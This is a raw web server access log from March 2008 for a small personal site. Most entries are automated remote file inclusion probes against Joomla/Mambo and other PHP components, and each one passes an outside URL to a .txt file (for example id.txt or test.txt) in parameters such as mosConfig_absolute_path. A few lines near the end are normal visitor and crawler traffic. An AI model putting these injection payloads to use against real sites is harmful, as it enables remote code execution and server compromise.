72.218.53.244 - - [17/Mar/2008:08:29:37 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:08:29:38 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:08:29:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:08:29:38 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:08:29:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:08:29:38 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:08:29:49 -0700] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:08:29:49 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:08:29:49 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:29:58 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:29:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:29:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:30:03 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:30:04 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:30:04 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:30:04 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:30:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:30:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.120 - - [17/Mar/2008:08:30:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
62.141.48.120 - - [17/Mar/2008:08:30:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:08:30:10 -0700] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:08:30:10 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:08:30:10 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:30:13 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:30:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:30:14 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:08:30:18 -0700] "GET /logs/access_080220.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.170.84.111 - - [17/Mar/2008:08:30:18 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.rce-bay.com/shop/shop.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:08:30:31 -0700] "GET /logs/access_080220.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:30:33 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:30:34 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:30:34 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.83.155.102 - - [17/Mar/2008:08:30:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.83.155.102 - - [17/Mar/2008:08:30:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.83.155.102 - - [17/Mar/2008:08:30:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
218.83.155.102 - - [17/Mar/2008:08:30:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
218.83.155.102 - - [17/Mar/2008:08:30:47 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
218.83.155.102 - - [17/Mar/2008:08:30:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:31:15 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:31:15 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:31:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:31:18 -0700] "GET /logs/access_080228.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:31:26 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:31:26 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:31:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:31:32 -0700] "GET /logs/access_080228.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:31:32 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:31:33 -0700] "GET //skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:31:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:31:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:31:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:31:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:08:31:58 -0700] "GET //errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:32:15 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:32:19 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:32:20 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:32:20 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:32:24 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:32:28 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:32:43 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:08:32:43 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
200.43.77.58 - - [17/Mar/2008:08:32:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.43.77.58 - - [17/Mar/2008:08:32:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
213.35.225.138 - - [17/Mar/2008:08:32:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.rce-bay.com/shop/shop.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:32:56 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:32:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:32:56 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [17/Mar/2008:08:33:10 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.44.73.116 - - [17/Mar/2008:08:33:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:33:11 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:33:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:33:11 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.87 - - [17/Mar/2008:08:33:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.75 - - [17/Mar/2008:08:33:48 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 618239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:33:57 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:08:34:04 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.220.82 - - [17/Mar/2008:08:36:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
202.142.220.82 - - [17/Mar/2008:08:36:05 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:36:48 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:36:48 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:36:48 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:08:37:38 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.211 - - [17/Mar/2008:08:37:49 -0700] "GET /logs/access_070802.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.102.153 - - [17/Mar/2008:08:38:00 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.118.102.153 - - [17/Mar/2008:08:38:00 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.212.173.42 - - [17/Mar/2008:08:38:07 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/p4n93r4nk0d0k/yhe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:38:40 -0700] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:38:41 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:38:41 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.170.96.181 - - [17/Mar/2008:08:38:59 -0700] "GET /logs/access_080215.log/index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.170.96.181 - - [17/Mar/2008:08:38:59 -0700] "GET /index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.170.96.181 - - [17/Mar/2008:08:38:59 -0700] "GET /logs/index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:15 -0700] "GET /bikes/GPS/WeSTOC2008/?N=A HTTP/1.1" 200 858 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:16 -0700] "GET /bikes/?A HTTP/1.1" 200 2320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:18 -0700] "GET /bikes/dteel/2008_01_26/?D=D HTTP/1.1" 200 6616 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
66.70.14.90 - - [17/Mar/2008:08:39:18 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:21 -0700] "GET /bikes/dteel/2008_02_16/?N=A HTTP/1.1" 200 1696 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:22 -0700] "GET /bikes/GPS/WeSTOC2008/?N=D HTTP/1.1" 200 858 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:23 -0700] "GET /bikes/dteel/2008_02_16/?N=D HTTP/1.1" 200 1696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:26 -0700] "GET /bikes/CreSTOC07/?M=A HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:29 -0700] "GET /bikes/CreSTOC07/?M=D HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:33 -0700] "GET /bikes/dteel/140CANON/ HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:34 -0700] "GET /bikes/dteel/140CANON/?N=D HTTP/1.1" 200 987 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:35 -0700] "GET /bikes/dteel/140CANON/?N=A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:35 -0700] "GET /bikes/cb750K6/ HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:36 -0700] "GET /bikes/cb750K6/?N=D HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
